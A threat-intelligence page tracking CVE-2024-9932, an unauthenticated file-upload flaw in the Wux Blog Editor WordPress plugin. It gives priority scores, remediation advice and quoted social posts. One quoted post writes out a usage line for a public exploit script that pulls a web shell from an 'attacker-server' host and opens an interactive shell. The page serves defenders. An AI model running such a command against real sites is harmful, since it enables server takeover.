CVE-2024-9932Exploit

LOWCVSS 9.8 · CRITICAL

Exploit discussion active in current signal (1 latest mentions)

Immediate actions

  • Prioritize remediation for affected systems immediately
  • Hunt for exploitation attempts and persistence artifacts
  • Increase monitoring for publicly documented tradecraft
  • Track advisory updates for patch or workaround availability

Recommended action window: High priority (within 72h)

NVD description

The Wux Blog Editor plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'wuxbt_insertImageNew' function in versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

3.5/ 10 priority

Sources & remediation

Weakness type (CWE)
CWE-434

Priority

LOW

Exploitation

NONE

PoC

YES

Patch

NONE

Momentum

STABLE

Threat summary

  • Public PoC and exploit tooling are both present
  • 3 mentions across 2 observed days
  • Momentum state: stable

What's happening

  • Exploit tool or code specified in 2 signals
  • PoC mentioned or linked in 2 signals
  • Technical details provided in 3 signals
  • Disclosure: 1 classified signal
  • Peaked 1d ago at 2 mentions (2026-01-27); latest day: 1
  • 3 total mentions across 2 days

Deep dive

Activity timeline3 mentions / 2d
01122Mentions · 2026-01-27: 2Mentions · 2026-01-31: 1PoC Mentioned / Linked · 2026-01-27: 2Exploit Tool / Code · 2026-01-27: 2Technical Details · 2026-01-27: 2Technical Details · 2026-01-31: 101-2701-31
Signal classification3 categories
Exploit
133.3%
PoC
133.3%
Disclosure
133.3%
Referenced assets3 URLs
Classification over time
DateTotalLabels
2026-01-272
Exploit1PoC1
2026-01-311
Disclosure1
Full discourse3 posts
  • Dark Web Informer@DarkWebInformer
    Exploit

    ‼️ CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE). GitHub: https://github.com/JoshuaProvoste/0-click-RCE-Exploit-for-CVE-2024-9932 Type: 0-Click RCE Exploit Usage: python http://CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php After execution, the script uploads the payload, confirms its accessibility, detects the OS, and drops into an interactive shell.

    Post summary

    The CVE-2024-9932 vulnerability is exposed through a publicly available 0‑click RCE exploit on GitHub, with a Python script that uploads a payload and establishes an interactive shell on the vulnerable WordPress plugin.

    23121014911.0K
    165.8K followersView on X
  • kokumօtօ@__kokumoto
    PoC

    WordPressのプラグインWux Blog Editorの脆弱性CVE-2024-9932に対応するPoC(攻撃の概念実証コード)が公開。無認証での遠隔コード実行。 https://darkwebinformer.com/cve-2024-9932-an-unauthenticated-arbitrary-file-upload-vulnerability-in-the-wux-blog-editor-wordpress-plugin-leading-to-remote-command-execution-rce/

    Post summary

    A Proof of Concept for CVE‑2024‑9932, demonstrating unauthenticated remote code execution via an arbitrary file upload in the Wux Blog Editor plugin, has been published, but no evidence of active exploitation or remediation details is provided.

    00032813
    7.2K followersView on X
  • jp / kw0@JoshuaProvoste
    Disclosure

    Thanks for mention 😇 @DarkWebInformer https://darkwebinformer.com/cve-2024-9932-an-unauthenticated-arbitrary-file-upload-vulnerability-in-the-wux-blog-editor-wordpress-plugin-leading-to-remote-command-execution-rce/

    Post summary

    The tweet shares a link to an article that discloses CVE‑2024‑9932, an unauthenticated arbitrary file upload flaw in the Wux Blog Editor WordPress plugin that can lead to remote command execution.

    00010185
    2.8K followersView on X

Explore more